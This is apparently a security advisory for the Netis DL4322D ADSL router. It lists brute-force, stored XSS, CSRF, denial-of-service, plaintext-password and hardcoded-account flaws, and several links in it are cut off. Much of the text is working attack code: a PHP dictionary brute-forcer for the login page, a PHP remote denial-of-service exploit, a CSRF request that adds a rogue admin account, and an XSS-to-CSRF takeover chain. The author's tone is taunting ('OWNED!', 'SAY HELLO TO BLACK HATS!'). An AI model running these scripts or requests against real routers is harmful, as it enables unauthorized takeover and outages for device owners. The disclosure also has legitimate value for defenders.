Vulnerable Device:
NETIS DL4322D 300Mbps Wireless N ADSL2+ Modem Router Multiple vulnerabilites
(Other models of netis may also suffer from this vulns)
Vendor: http:
Product overview:
http:
The netis DL4322D is a 3-in-1 device that combines the functions of a high speed ADSL2+ modem, 4-port NAT router and wireless N access point. It is designed to provide end -users with a one-stop solution to acquiring and sharing high-speed Internet access over a wired/wireless network. Supporting the latest ADSL standards, the DL4322D brings with it much higher speed than dial-up connections. It also provides some practical functions, such as Port Mapping for IPTV, Ethernet WAN, SNMP, IPv6, TR-069 and more. With this product, users can now enjoy more kinds of heavy bandwidth consuming applications like wireless HD video streaming.
===================================
Vulns: Bruteforce/XSS/Denial Of Service(UnAuthenticated/Authenticated)/CSRF/
Plaintext Passwords/HardCoded Usernames
===================================
0) Bruteforce on login page:
http:
There is no any anti-bruteforce implementation exists. (FULL PROOF CAPTCHA)
So it is vulnerable to bruteforce.
=========== BRUTEFORCER ============
<?php
$page = 'login.cgi' ;
$usage = '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' . PHP_EOL . 'Usage:' . PHP_EOL .
'php -f brute.php guest/user /tmp/dictionary.txt http://192.168.1.1/' . PHP_EOL . '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' . PHP_EOL;
if ( count ( $argv )!==4) die ( $usage );
$uname = $argv [1];
$passmassiv = $argv [2];
$ip = $argv [3];
$page = $ip . $page ;
$passmassiv =file( $passmassiv ) or die ( 'Unable to open dictionary!' );
foreach ( $passmassiv as $pass )
{
$pass =trim( $pass );
$post = 'username=' . $uname . '&password=' . $pass . '&submit.htm%3Flogin.htm=Send' ;
$ch = curl_init();
curl_setopt( $ch ,CURLOPT_URL, $page );
curl_setopt( $ch ,CURLOPT_RETURNTRANSFER,true);
curl_setopt( $ch ,CURLOPT_HEADER, true);
curl_setopt( $ch , CURLOPT_POST, sizeof( $post ));
curl_setopt( $ch , CURLOPT_POSTFIELDS, $post );
$response =curl_exec( $ch );
if (!preg_match( '/Username or password error/i' , $response ))
{
echo 'OWNED! ' . $uname . ' PASSWD: ' . $pass . PHP_EOL;
exit ;
}
else
{
echo ' Verifying user: => ' . $uname . ' TRYING AS PASS:=> ' . $pass . PHP_EOL;
}
}
unset( $pass );
?>
======== EOF BRUTEFORCER ==============
===================================
1) XSS via incorrect login:password attempts.
Since web interface of this device default is open to PUBLIC there is a big chance to be owned.
This device has a capability to log incorrect login:password attempts.
But it fails to sanitise user input and then it stores it in log.Administrator can view this log.
Once administrator tries to view injected logs via web interface =game over.
Exploitation:
Using XSS redirect admin to 3'rd party site.
Exploit CSRF flaws(it is up to you) add new admin/kick remote machine to DMZ and etc. then logon to device.
SEE: XSS.png && unsanitized_input_passed.png
http:
http:
===================================
2) Remote Unauthenticated Denial Of Service Exploit.
Since web interface is open to PUBLIC:( default )
<?php
error_reporting (0);
$page = 'login.cgi' ;
$usage = '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' . PHP_EOL . 'NETIS DL4322D REMOTE DENIAL OF SERVICE EXPLOIT' . PHP_EOL .
'Usage:' . PHP_EOL .
if ( count ( $argv )!==2) die ( $usage );
$ip = $argv [1];
$page = $ip . $page ;
if ( file_get_contents ( $ip . 'login.htm' )) echo '[+] Target is Online! [+]' . PHP_EOL;
sleep(3);
echo '[+] Sending Payload! [+]' . PHP_EOL;
sleep(3);
$payload = str_repeat ( 'AKASTEP' ,500);
$post = 'username=' . $payload . '&password=SAY HELLO TO BLACK HATS!&submit.htm%3Flogin.htm=Send' ;
$ch = curl_init();
curl_setopt( $ch ,CURLOPT_URL, $page );
curl_setopt( $ch ,CURLOPT_RETURNTRANSFER,true);
curl_setopt( $ch ,CURLOPT_HEADER, true);
curl_setopt( $ch , CURLOPT_TIMEOUT, 12);
curl_setopt( $ch , CURLOPT_POST, sizeof( $post ));
curl_setopt( $ch , CURLOPT_POSTFIELDS, $post );
$response =curl_exec( $ch );
echo '[+] Payload WAS Sent... Please wait... [+]' .PHP_EOL;
curl_close( $ch );
sleep(2);
if (! file_get_contents ( $page )) echo ( '[+] Remote Target Down! [+]' . PHP_EOL);
exit ;
?>
===================================
3) DOS (Authenticated) but can be combined with XSS+CSRF remotely.
http:
HEADERS:
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*
*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
If-Modified-Since: *
DATA TO POST:
username=owned_device&privilege=2&newpass=aDhexLbT8&confpass=aDhexLbT8&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
SEE: CSRF_VULNERABLE_FORMS.png
http:
==========================================================================
5)
Plaintext passwords
SEE: PLAINTEXT_PASSWORDS_FROM_SOURCE_OF_PAGE.png
http:
==========================================================================
6) Hardcoded usernames.
This device has 2 hardcoded accounts.
guest and user
guest <= it has a root privilegie
user <= is a limited user
You can change paswords for them but you can't delete or rename them.
|